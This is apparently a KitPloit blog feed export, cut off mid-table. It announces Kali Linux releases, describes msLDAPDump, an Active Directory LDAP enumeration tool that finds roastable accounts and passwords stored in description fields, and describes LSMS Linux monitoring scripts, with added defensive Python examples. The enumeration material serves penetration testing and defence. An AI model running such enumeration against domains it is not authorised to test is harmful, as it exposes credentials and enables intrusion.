tag:blogger.com,1999:blog-83172222311336605472024-03-19T02:21:46.575-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger2307125tag:blogger.com,1999:blog-8317222231133660547.post-42295666330003857822024-03-02T22:01:00.002-03:002024-03-02T22:01:27.800-03:00Kali Linux 2024.1 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHxmgnPnFWLMi89MxWFqpyXnD9tTAwrUKj90bso-fwtYvqhK8Ho29AjUD7D_SSasRQ_gxYhOS03kx7mAJKGwokwu-P6hmRnyKwCpqR4_dIfq44zid2fuEoOnqBN1_w_gI5IScv6OYIgkvFAvzPCi6ZLNW1L1tMvbBZyiRwKeJXVVkfsodT76cez3tWIc29/s1200/kali-linux-banner-2024.1-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHxmgnPnFWLMi89MxWFqpyXnD9tTAwrUKj90bso-fwtYvqhK8Ho29AjUD7D_SSasRQ_gxYhOS03kx7mAJKGwokwu-P6hmRnyKwCpqR4_dIfq44zid2fuEoOnqBN1_w_gI5IScv6OYIgkvFAvzPCi6ZLNW1L1tMvbBZyiRwKeJXVVkfsodT76cez3tWIc29/w640-h334/kali-linux-banner-2024.1-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><p></p>
Time for another Kali Linux release! – Kali Linux 2024.1. This release has various impressive updates.<span><a name='more'></a></span><div><p><br /></p><p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2023-4-release/">2023.4 release from December</a> is:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#introducing-the-micro-mirror-free-software-cdn">Micro Mirror Free Software CDN</a></strong> - FCIX Software Mirror reached out offering to host our images, and we said yes</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#2024-theme-refresh">2024 Theme Refresh</a></strong> - Our yearly theme refresh with all new wallpapers and GRUB theme</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#other-desktop-changes">Other Desktop Environment Changes</a></strong> - A few new tweaks to our default environments</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#kali-nethunter-updates">NetHunter Updates</a></strong> - NetHunter Rootless for Android 14, Bad Bluetooth HID attacks, and other updates</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new shiny tools!</li></ul></div><div><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2024-1-release/">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2024.1</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-16525270025300223462023-12-06T16:48:00.001-03:002023-12-06T16:48:44.695-03:00Kali Linux 2023.4 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeSZqwKhlzGxuhn7BQFGfzkW7eZhtbQpGaqsf9Sc9pOIutKLzsXq52gM5BXnGVasufyoSulQENGizsQkucsHVEa2NfdXl5iAndy42TK32A6TzyUwjb83fYU4QLc9_mRDuLcEbGDJ_wpY7vngJSc96Sdgo7XMbkBV-6h5xJcWqB8NifoeU_2CJnaa4Pf_sY/s1200/kali-linux-banner-2023.4-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeSZqwKhlzGxuhn7BQFGfzkW7eZhtbQpGaqsf9Sc9pOIutKLzsXq52gM5BXnGVasufyoSulQENGizsQkucsHVEa2NfdXl5iAndy42TK32A6TzyUwjb83fYU4QLc9_mRDuLcEbGDJ_wpY7vngJSc96Sdgo7XMbkBV-6h5xJcWqB8NifoeU_2CJnaa4Pf_sY/w640-h334/kali-linux-banner-2023.4-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><p></p>
Time for another Kali Linux release! – Kali Linux 2023.4. This release has various impressive updates.<span><a name='more'></a></span><div><p><br /></p><p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2023-3-release/">2023.3 release from August</a> is:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#cloud-arm-marketplaces">Cloud ARM64</a></strong> - The marketplaces on Amazon AWS and Microsoft Azure now have an ARM64 option</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#vagrant-hyper-v-support">Vagrant Hyper-V</a></strong> - Our Vagrant offering now supports Hyper-V</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#raspberry-pi-5">Raspberry Pi 5</a></strong> - Kali on the latest Raspberry Pi foundation device</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#gnome-45">GNOME 45</a></strong> - Kali theme is on the latest versions</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#internal-infrastructure">Internal Infrastructure</a></strong> - Peek at what is going on behind the scenes with mirrorbits</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-4-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new & updated packages</li></ul></div><div><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2023-4-release/">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2023.4</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-17151341680504293432023-08-23T23:08:00.001-04:002023-08-23T23:08:17.938-04:00Kali Linux 2023.3 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Q00yQCkQdJJS7TW7EmfLvp9IQrug_4k3R3_0zelWzmv1AJ26cWjo4Kmdjs-1c7RvMSfv7cX0hIV9-Udmu9LtoXdxlf1QXcRKxdyg3B7cqvgH2okU1Ma2cEqWCXJZCdi45M-1hnrlaQBePmJSlk1-35uLoXY8uEArRyJvqgHjTw6LSVPlts5jmCFsqHCH/s1200/banner-2023.3-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Q00yQCkQdJJS7TW7EmfLvp9IQrug_4k3R3_0zelWzmv1AJ26cWjo4Kmdjs-1c7RvMSfv7cX0hIV9-Udmu9LtoXdxlf1QXcRKxdyg3B7cqvgH2okU1Ma2cEqWCXJZCdi45M-1hnrlaQBePmJSlk1-35uLoXY8uEArRyJvqgHjTw6LSVPlts5jmCFsqHCH/w640-h334/banner-2023.3-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><p></p>
Time for another Kali Linux release! – Kali Linux 2023.3. This release has various impressive updates.<span><a name='more'></a></span><div><p><br /></p><p>The highlights of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2023-2-release/">2023.2 release from May</a>:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-3-release/#internal-infrastructure">Internal Infrastructure</a></strong> - Major stack changes are under way</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-3-release/#kali-autopilot">Kali Autopilot</a></strong> - The automation attack framework has had a major overhaul</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-3-release/#new-tools-in-kali">New Tools</a></strong> - 9 new tools added this time round!</li></ul></div><div><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2023-3-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2023.3</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-74943859094477661872023-06-24T08:30:00.001-04:002023-06-24T08:30:00.128-04:00msLDAPDump - LDAP Enumeration Tool<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhEbUgVoVUy8qzOsCxcILQ7LnMIN7w7tQK5nkWNjhBqNHORlhNsdvFkEuili5Uu63NRW4Z-deXWF32dw2-oDfIgyfCQC_sFlP2HdBMHML1Qidh-exARNgUUJCcbR7kpGC0FI5MkkE3jG7ZuxyvFR-JEHMmPPEQGNhaJMZ0Rwk8nQuiZIyrCgHkwMlJV4w" style="text-align: -webkit-center;"><img alt="" border="0" height="222" id="BLOGGER_PHOTO_ID_7233982034686329570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhEbUgVoVUy8qzOsCxcILQ7LnMIN7w7tQK5nkWNjhBqNHORlhNsdvFkEuili5Uu63NRW4Z-deXWF32dw2-oDfIgyfCQC_sFlP2HdBMHML1Qidh-exARNgUUJCcbR7kpGC0FI5MkkE3jG7ZuxyvFR-JEHMmPPEQGNhaJMZ0Rwk8nQuiZIyrCgHkwMlJV4w=w640-h222" width="640" /></a></p><p dir="auto"><br /></p> <p dir="auto">msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping the ldap3 library from Python in an easy-to-use interface. Like most of my tools, this one works best on Windows. 
If using Unix, the tool will not resolve hostnames that are not accessible via eth0 currently.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h3 dir="auto" tabindex="-1">Binding Anonymously</h3> <p dir="auto">Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, <a href="https://www.kitploit.com/search/label/Domain%20Controller" target="_blank" title="domain controller">domain controller</a> hostnames, and more.</p> <p align="center" dir="auto"> <a href="https://github.com/dievus/msLDAPDump/blob/main/images/anonbind.png" rel="nofollow" target="_blank" title="LDAP enumeration tool implemented in Python3 (3)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhEbUgVoVUy8qzOsCxcILQ7LnMIN7w7tQK5nkWNjhBqNHORlhNsdvFkEuili5Uu63NRW4Z-deXWF32dw2-oDfIgyfCQC_sFlP2HdBMHML1Qidh-exARNgUUJCcbR7kpGC0FI5MkkE3jG7ZuxyvFR-JEHMmPPEQGNhaJMZ0Rwk8nQuiZIyrCgHkwMlJV4w"><img alt="" border="0" height="222" id="BLOGGER_PHOTO_ID_7233982034686329570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhEbUgVoVUy8qzOsCxcILQ7LnMIN7w7tQK5nkWNjhBqNHORlhNsdvFkEuili5Uu63NRW4Z-deXWF32dw2-oDfIgyfCQC_sFlP2HdBMHML1Qidh-exARNgUUJCcbR7kpGC0FI5MkkE3jG7ZuxyvFR-JEHMmPPEQGNhaJMZ0Rwk8nQuiZIyrCgHkwMlJV4w=w640-h222" width="640" /></a> </p> <h3 dir="auto" tabindex="-1">Credentialed Bind</h3> <p align="center" dir="auto"> <a href="https://github.com/dievus/msLDAPDump/blob/main/images/authbind.png" rel="nofollow" target="_blank" title="LDAP enumeration tool implemented in Python3 (4)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhUWZF2dxcMBBHZyJHixwrTIlS4P3-U45y8jF3s9PpZMZ1kxanypVjHRVtLAXOEXuQX4ZpBVhLDo24jD132os8t_QHPMQQx5iE80bET5Ezyxmh8y_H_nvg6ICAuM5ENdauQ387ZMC26s5Sbj_V-aqTZ1lZpGf2K4KBiDzOan-re4D7EZZAqsEUTidhmwA"><img alt="" border="0" height="178" id="BLOGGER_PHOTO_ID_7233982041596421442" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEhUWZF2dxcMBBHZyJHixwrTIlS4P3-U45y8jF3s9PpZMZ1kxanypVjHRVtLAXOEXuQX4ZpBVhLDo24jD132os8t_QHPMQQx5iE80bET5Ezyxmh8y_H_nvg6ICAuM5ENdauQ387ZMC26s5Sbj_V-aqTZ1lZpGf2K4KBiDzOan-re4D7EZZAqsEUTidhmwA=w640-h178" width="640" /></a> </p> <p align="center" dir="auto"> <a href="https://github.com/dievus/msLDAPDump/blob/main/images/ntlmbind.png" rel="nofollow" target="_blank" title="LDAP enumeration tool implemented in Python3 (5)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhsJ8XoQ3g2968ND74US6AzmOltiD_MD-QO1oOdI2tOIoyEUF4FPP_kttXltSf1_tDaqL9NpjJhXJGyf2C0Ik-CKkDLkOS1R8_EgCxBfB2-xI298C5lw_SXJ3kOYTwXdtHYU02gUqUuyCIBXj5u1RZX27exfjNJK2RBQeDNqjjeO8orSCmxVMCr8_phxA"><img alt="" border="0" height="188" id="BLOGGER_PHOTO_ID_7233982049260479970" src="https://blogger.googleusercontent.com/img/a/AVvXsEhsJ8XoQ3g2968ND74US6AzmOltiD_MD-QO1oOdI2tOIoyEUF4FPP_kttXltSf1_tDaqL9NpjJhXJGyf2C0Ik-CKkDLkOS1R8_EgCxBfB2-xI298C5lw_SXJ3kOYTwXdtHYU02gUqUuyCIBXj5u1RZX27exfjNJK2RBQeDNqjjeO8orSCmxVMCr8_phxA=w640-h188" width="640" /></a> </p> Users can bind to LDAP utilizing valid user account <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="credentials">credentials</a> or a valid NTLM hash. 
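The credentialed checks this tool performs (Kerberoastable and ASREPRoastable accounts, constrained and unconstrained delegation, domain controllers, deprecated operating systems) amount to an audit of account attributes. The block below is an added example, not msLDAPDump's own code, that applies those checks to a constructed set of directory entries so an administrator can see what such a dump would flag in their own domain. The userAccountControl bit values are Microsoft's documented constants; the deprecated-OS prefix list, the attribute names on the `Entry` class and the sample entries are assumptions made for this example.

```python
"""Point-in-time audit of directory account attributes for the risky
configurations an LDAP dump such as msLDAPDump enumerates.
Added example, not part of msLDAPDump; the entries are constructed,
not pulled from a live domain."""
from dataclasses import dataclass, field
from typing import Dict, List

# userAccountControl bit flags as documented by Microsoft.
ACCOUNTDISABLE = 0x0002
WORKSTATION_TRUST_ACCOUNT = 0x1000      # member computer account
SERVER_TRUST_ACCOUNT = 0x2000           # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000        # unconstrained delegation
DONT_REQUIRE_PREAUTH = 0x400000         # Kerberos pre-auth disabled (AS-REP roastable)

# Operating-system prefixes treated as deprecated (assumption for this example).
DEPRECATED_OS_PREFIXES = ("Windows XP", "Windows 7",
                          "Windows Server 2003", "Windows Server 2008")


@dataclass
class Entry:
    """Subset of LDAP attributes the audit needs (names mirror AD attributes)."""
    sam_account_name: str
    user_account_control: int
    service_principal_names: List[str] = field(default_factory=list)
    allowed_to_delegate_to: List[str] = field(default_factory=list)  # msDS-AllowedToDelegateTo
    operating_system: str = ""


def audit(entries: List[Entry]) -> Dict[str, List[str]]:
    """Classify enabled accounts; disabled accounts are skipped because none of
    the listed conditions is usable on them."""
    findings = {k: [] for k in ("kerberoastable", "asrep_roastable", "unconstrained",
                                "constrained", "domain_controllers", "deprecated_os")}
    for e in entries:
        uac = e.user_account_control
        if uac & ACCOUNTDISABLE:
            continue
        is_dc = bool(uac & SERVER_TRUST_ACCOUNT)
        is_computer = is_dc or bool(uac & WORKSTATION_TRUST_ACCOUNT)
        name = e.sam_account_name
        if is_dc:
            findings["domain_controllers"].append(name)
        # Kerberoastable: a user account (not a machine, not krbtgt) carrying an SPN.
        if e.service_principal_names and not is_computer and name.lower() != "krbtgt":
            findings["kerberoastable"].append(name)
        if uac & DONT_REQUIRE_PREAUTH:
            findings["asrep_roastable"].append(name)
        # Domain controllers legitimately carry TRUSTED_FOR_DELEGATION; report everything else.
        if uac & TRUSTED_FOR_DELEGATION and not is_dc:
            findings["unconstrained"].append(name)
        if e.allowed_to_delegate_to:
            findings["constrained"].append(name)
        if e.operating_system.startswith(DEPRECATED_OS_PREFIXES):
            findings["deprecated_os"].append(name)
    return {k: sorted(v) for k, v in findings.items()}


# Constructed sample directory (0x200 is the NORMAL_ACCOUNT bit).
SAMPLE_ENTRIES = [
    Entry("svc_sql", 0x200, service_principal_names=["MSSQLSvc/sql01.corp.example:1433"]),
    Entry("jdoe", 0x200 | DONT_REQUIRE_PREAUTH),
    Entry("krbtgt", 0x200 | ACCOUNTDISABLE, service_principal_names=["kadmin/changepw"]),
    Entry("DC01$", SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
          operating_system="Windows Server 2022 Standard"),
    Entry("APP01$", WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
          operating_system="Windows Server 2008 R2 Standard"),
    Entry("WEB01$", WORKSTATION_TRUST_ACCOUNT,
          allowed_to_delegate_to=["HTTP/app01.corp.example"],
          operating_system="Windows Server 2019 Standard"),
    Entry("svc_web", 0x200, allowed_to_delegate_to=["cifs/fs01.corp.example"]),
]

if __name__ == "__main__":
    for category, names in audit(SAMPLE_ENTRIES).items():
        print(f"{category:20s} {', '.join(names) or '-'}")
```

Feeding the output of a real LDAP query into `Entry` objects is the only change needed to run this against an export of your own domain; each finding then maps to a hardening step (remove the SPN or move the service to a gMSA, re-enable pre-authentication, replace unconstrained with resource-based constrained delegation, retire the old operating system).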
A credentialed bind obtains the same information as the anonymous bind and additionally checks for the following: <ul dir="auto"> <li>Subnet scan for systems with ports 389 and 636 open</li> <li>Basic Domain Info (Current user permissions, domain SID, password policy, machine account quota)</li> <li>Users</li> <li>Groups</li> <li>Kerberoastable Accounts</li> <li>ASREPRoastable Accounts</li> <li>Constrained Delegation</li> <li>Unconstrained Delegation</li> <li>Computer Accounts - will also attempt DNS lookups on the hostname to identify IP addresses</li> <li>Identify Domain Controllers</li> <li>Identify Servers</li> <li>Identify Deprecated Operating Systems</li> <li>Identify MSSQL Servers</li> <li>Identify Exchange Servers</li> <li>Group Policy Objects (GPO)</li> <li>Passwords in User description fields</li> </ul> <p dir="auto">Each check writes the raw contents to a text file and prints an abbreviated, cleaner version of the results in the terminal. The results in the terminal are pulled from the individual text files.</p> <ul class="contains-task-list"> <li class="task-list-item">Add support for LDAPS (LDAP Secure)</li> <li class="task-list-item">NTLM Authentication</li> <li class="task-list-item">Figure out why Unix only allows one adapter to make a call out to the LDAP server (removed resolution from Linux until resolved)</li> <li class="task-list-item">Add support for querying child domain information (currently does not respond nicely to querying child domain controllers)</li> <li class="task-list-item">Figure out how to link the name to the Description field dump at the end of the script</li> <li class="task-list-item">Implement <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> options rather than inputs</li> <li class="task-list-item">Check for deprecated operating systems in the domain</li> </ul> <h3 dir="auto" tabindex="-1">Mandatory Disclaimer</h3> <p dir="auto">Please 
keep in mind that this tool is meant for <a href="https://www.kitploit.com/search/label/Ethical%20Hacking" target="_blank" title="ethical hacking">ethical hacking</a> and <a href="https://www.kitploit.com/search/label/Penetration%20Testing" target="_blank" title="penetration testing">penetration testing</a> purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/dievus/msLDAPDump" rel="nofollow" target="_blank" title="Download msLDAPDump">Download msLDAPDump</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-31801211123937186412023-06-18T08:30:00.001-04:002023-06-18T08:30:00.131-04:00LSMS - Linux Security And Monitoring Scripts<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhOUAv4hUykZ7J9MXslUWbxCDdlHdtbIiIMFSGK9cWC7UGCIY9e3NHe6DdxYtRR50ZdqSyROXW3zOdvWk0KOv1UEeXNA3OqCuSVUK1CNkgr3H9OYCM3UIFSukK_k-zf4nsXK43n30h3uePBiAHWqvanxuri0bxEHY9AWSzfakNd4mYQTxUVL4bwWJBxg/s537/h39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="353" data-original-width="537" height="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhOUAv4hUykZ7J9MXslUWbxCDdlHdtbIiIMFSGK9cWC7UGCIY9e3NHe6DdxYtRR50ZdqSyROXW3zOdvWk0KOv1UEeXNA3OqCuSVUK1CNkgr3H9OYCM3UIFSukK_k-zf4nsXK43n30h3uePBiAHWqvanxuri0bxEHY9AWSzfakNd4mYQTxUVL4bwWJBxg/w640-h420/h39.png" width="640" /></a></div><div><br /></div><div> <p dir="auto">These are a collection of security and monitoring <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="scripts">scripts</a> you can use to monitor your Linux installation for security-related events or for an investigation. 
Each script works on its own and is independent of the other scripts. The scripts can be set up to either print out their results, send them to you via mail, or use <a href="https://github.com/sqall01/alertR" rel="nofollow" target="_blank" title="AlertR">AlertR</a> as a notification channel.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Repository Structure</h2> <p dir="auto">The scripts are located in the <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> <code>scripts/</code>. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.</p> <p dir="auto">Each script has a configuration file in the <code>scripts/config/</code> directory to configure it. If the configuration file is not found during the execution of the script, the script falls back to default settings and prints out the results. Hence, it is not necessary to provide a configuration file.</p> <p dir="auto">The <code>scripts/lib/</code> directory contains code that is shared between different scripts.</p> <p dir="auto">Scripts using a <code>monitor_</code> prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only show the current state of the Linux system and not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the <code>--init</code> argument.</p> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">Take a look at the header of the script you want to execute. 
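The <code>monitor_</code> scripts described above keep a baseline and report deviations from it on later runs. The following is an added example of that baseline-and-diff pattern, written for this page and not taken from the LSMS repository; the watched paths, the state file location and the sample files are all constructed here, and nothing about LSMS internals is assumed.

```python
"""Baseline-and-diff file monitor in the style of the LSMS monitor_ scripts.
Added example, not code from the LSMS repository. The first run (or --init)
stores a baseline of SHA-256 hashes; later runs report files that appeared,
disappeared or changed since the baseline and then record the new state, so
each change is reported exactly once. Paths are parameters so it runs on a
temporary directory."""
import hashlib
import json
import os
import tempfile


def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(paths):
    """Map each watched path to its hash, or None when the file does not exist,
    so a file that appears later (e.g. /etc/ld.so.preload) is reported."""
    return {p: (hash_file(p) if os.path.isfile(p) else None) for p in paths}


def load_state(state_file):
    with open(state_file) as f:
        return json.load(f)


def save_state(state_file, state):
    with open(state_file, "w") as f:
        json.dump(state, f)


def check(paths, state_file, init=False):
    """Compare the current snapshot with the stored baseline; --init (or a
    missing state file) only establishes the baseline and reports nothing."""
    current = snapshot(paths)
    if init or not os.path.exists(state_file):
        save_state(state_file, current)
        return {"initialized": True, "added": [], "removed": [], "modified": []}
    baseline = load_state(state_file)
    result = {"initialized": False, "added": [], "removed": [], "modified": []}
    for p in paths:
        old, new = baseline.get(p), current[p]
        if old is None and new is not None:
            result["added"].append(p)
        elif old is not None and new is None:
            result["removed"].append(p)
        elif old != new:
            result["modified"].append(p)
    save_state(state_file, current)
    return result


def demo():
    """Run the monitor twice on a constructed temporary directory and return
    both results with paths reduced to basenames."""
    with tempfile.TemporaryDirectory() as d:
        hosts = os.path.join(d, "hosts")
        preload = os.path.join(d, "ld.so.preload")
        state = os.path.join(d, "state.json")
        with open(hosts, "w") as f:
            f.write("127.0.0.1 localhost\n")
        watched = [hosts, preload]
        first = check(watched, state, init=True)
        # Simulate two events the real scripts watch for: a new hosts entry
        # and an ld.so.preload file appearing.
        with open(hosts, "a") as f:
            f.write("203.0.113.5 updates.example\n")
        with open(preload, "w") as f:
            f.write("/usr/local/lib/unknown.so\n")
        second = check(watched, state)

    def basenames(r):
        return {k: [os.path.basename(p) for p in v] if isinstance(v, list) else v
                for k, v in r.items()}

    return basenames(first), basenames(second)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Recording the new state after reporting is a deliberate choice: an hourly cron run then alerts once per change rather than every hour, which matches the "establish the current state as benign" semantics of `--init`. It also means the baseline is only as trustworthy as the system was when it was taken.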
The header contains a short description of what the script is supposed to do and what <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> are needed (if any are needed at all). If requirements are needed, install them before running the script.</p> <p dir="auto">The shared configuration file <code>scripts/config/config.py</code> contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the <code>scripts/config/</code> directory. If no configuration file is found, a default setting is used and the results are printed out.</p> <p dir="auto">Finally, you can run all configured scripts by executing <code>start_search.py</code> (which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.</p> <h3 dir="auto" tabindex="-1">Monitoring</h3> <p dir="auto">If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:</p> <ol dir="auto"> <li> <p dir="auto">Set up a notification channel that is supported by the scripts (currently printing out, mail, or <a href="https://github.com/sqall01/alertR" rel="nofollow" target="_blank" title="AlertR">AlertR</a>).</p> </li> <li> <p dir="auto">Configure the scripts that you want to run using the configuration files in the <code>scripts/config/</code> directory.</p> </li> <li> <p dir="auto">Execute <code>start_search.py</code> with the <code>--init</code> argument to initialize the scripts with the <code>monitor_</code> prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. 
If you are unsure of this, you should verify its current state.</p> </li> <li> <p dir="auto">Set up a cron job as <code>root</code> user that executes <code>start_search.py</code> (e.g., <code>0 * * * * root /opt/LSMS/start_search.py</code> to start the search hourly).</p> </li> </ol> <h2 dir="auto" tabindex="-1">List of Scripts</h2> <table> <tbody><tr> <th>Name</th> <th>Script</th> </tr> <tr> <td>Monitoring cron files</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_cron.py" rel="nofollow" target="_blank" title="monitor_cron.py">monitor_cron.py</a></td> </tr> <tr> <td>Monitoring /etc/hosts file</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_hosts_file.py" rel="nofollow" target="_blank" title="monitor_hosts_file.py">monitor_hosts_file.py</a></td> </tr> <tr> <td>Monitoring /etc/ld.so.preload file</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_ld_preload.py" rel="nofollow" target="_blank" title="monitor_ld_preload.py">monitor_ld_preload.py</a></td> </tr> <tr> <td>Monitoring /etc/passwd file</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_passwd.py" rel="nofollow" target="_blank" title="monitor_passwd.py">monitor_passwd.py</a></td> </tr> <tr> <td>Monitoring modules</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_modules.py" rel="nofollow" target="_blank" title="monitor_modules.py">monitor_modules.py</a></td> </tr> <tr> <td>Monitoring SSH authorized_keys files</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_ssh_authorized_keys.py" rel="nofollow" target="_blank" title="monitor_ssh_authorized_keys.py">monitor_ssh_authorized_keys.py</a></td> </tr> <tr> <td>Monitoring systemd unit files</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/monitor_systemd_units.py" rel="nofollow" target="_blank" title="monitor_systemd_units.py">monitor_systemd_units.py</a></td> </tr> <tr> <td>Search 
executables in /dev/shm</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_dev_shm.py" rel="nofollow" target="_blank" title="search_dev_shm.py">search_dev_shm.py</a></td> </tr> <tr> <td>Search <a href="https://www.kitploit.com/search/label/Fileless" target="_blank" title="fileless">fileless</a> programs (memfd_create)</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_memfd_create.py" rel="nofollow" target="_blank" title="search_memfd_create.py">search_memfd_create.py</a></td> </tr> <tr> <td>Search hidden ELF files</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_hidden_exe.py" rel="nofollow" target="_blank" title="search_hidden_exe.py">search_hidden_exe.py</a></td> </tr> <tr> <td>Search immutable files</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_immutable_files.py" rel="nofollow" target="_blank" title="search_immutable_files.py">search_immutable_files.py</a></td> </tr> <tr> <td>Search kernel thread impersonations</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_non_kthreads.py" rel="nofollow" target="_blank" title="search_non_kthreads.py">search_non_kthreads.py</a></td> </tr> <tr> <td>Search processes that were started by a now disconnected SSH session</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_ssh_leftover_processes.py" rel="nofollow" target="_blank" title="search_ssh_leftover_processes.py">search_ssh_leftover_processes.py</a></td> </tr> <tr> <td>Search running deleted programs</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/search_deleted_exe.py" rel="nofollow" 